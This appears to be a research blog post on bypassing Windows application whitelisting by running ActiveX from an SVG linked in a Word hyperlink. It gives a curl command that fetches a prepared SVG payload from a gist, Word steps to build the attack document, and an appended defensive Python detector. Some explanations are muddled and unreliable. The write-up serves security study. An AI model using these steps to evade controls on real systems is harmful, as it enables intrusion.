AWL bypass of the highest SRP rules using the trusted MSFT.Web.Browser

 


Introduction
Over the past few days I researched ActiveX and executing it in Microsoft Office via a hyperlink using a UNC path, or anything comparable to a UNC path.

[ ! ] Note
( Acknowledgements ) @byt3bl33d3r

Note: if you are used to using ActiveX inside HTML scripting, I bet you have a background in executing ActiveX in Internet Explorer. The topic here, however, is rarely seen in Microsoft Office. In fact, Microsoft Office 2016 generally does not read HTML with ActiveX or other files of that kind, in contrast to SVG files.

1 Note that ActiveX files placed in a hyperlink do not work the way SVG does.

2 An SVG document is the only kind we can put in a hyperlink; it is the only one read in Microsoft Office, by its reader named Bhyperlink.

For instance:
1. The first step is to create an SVG file with these strings.
2. If you have a problem, you can use this fix
(Raw SVG)
https://gist.githubusercontent.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0/raw/332b3fa640bb2fff6c59b38a28eaea39b9ec5df6/x000x02.svg


1 Download or create the required files.
2 Don't forget to set the location where the SVG is dropped, using $env variables.
[ Attention ] My tip: create this SVG file manually.

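# Destination folder: the current user's Desktop
$obj = $env:HOMEDRIVE + $env:HOMEPATH + "\Desktop\"
# "${obj}x000x02.svg" expands to the full destination path; the original "$obj+x000x02.svg" left a literal "+" in the file name
curl.exe https://gist.githubusercontent.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0/raw/332b3fa640bb2fff6c59b38a28eaea39b9ec5df6/x000x02.svg >> "${obj}x000x02.svg"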
 

1 We should confirm that the file exists and is 100% intact.
2 OK... the file is intact.


  • 1 At this point, in a sense
  • 2 We need to carry out a few steps
  • 3 You will place the SVG in a hyperlink with a UNC path
  • 4 Microsoft Word will read the SVG ActiveX without using Internet Explorer itself
  • 5 Follow the steps!
  • Click > Insert > WordArt > select the letters > right-click > Hyperlink


This is very cool: as a consequence, we should not forget that Office can read ActiveX without using Internet Explorer, which leads to bypassing security platforms such as Device Guard (after the UMCI update) as well as AWL/SRP. The bug has to be used together with Microsoft Office to bypass these platforms.

The AWL rules are currently active!
[ 1 ] We do not actually need Internet Explorer to execute ActiveX.

[ 2 ] We use Microsoft Office to execute ActiveX via an SVG document, using the Microsoft Office web browser.

[ 3 ] Note: this method works only with an SVG document inside the Microsoft Office web browser.
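
A defender-side check for the document shape described above, added here as an example that is not part of the original post: it lists external hyperlink relationships in a Word package whose target is a UNC/file path or an SVG file. It assumes the document is saved as OOXML (.docx), where hyperlink targets live in .rels parts; the function names, host name and sample package are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
UNC_OR_FILE = re.compile(r"^(file:|\\\\|//)", re.IGNORECASE)  # file: URL, \\host\share, //host/share


def suspicious_hyperlinks(docx_bytes):
    """Return (part, target, reasons) for external hyperlinks worth reviewing."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("Type") != HYPERLINK_TYPE or rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                reasons = []
                if UNC_OR_FILE.match(target):
                    reasons.append("unc-or-file-path")
                # Ignore any query string or fragment when checking the extension
                if re.split(r"[?#]", target)[0].lower().endswith(".svg"):
                    reasons.append("svg-target")
                if reasons:
                    findings.append((name, target, reasons))
    return findings


def build_sample_docx():
    """Constructed sample: a minimal package holding only a relationships part."""
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{HYPERLINK_TYPE}" '
        'Target="file:///\\\\fileserver.example\\share\\sample.svg" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{HYPERLINK_TYPE}" '
        'Target="https://www.example.com/page.html" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print(suspicious_hyperlinks(build_sample_docx()))
```

To scan a real file, pass its bytes, for example open(path, "rb").read(), to suspicious_hyperlinks.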
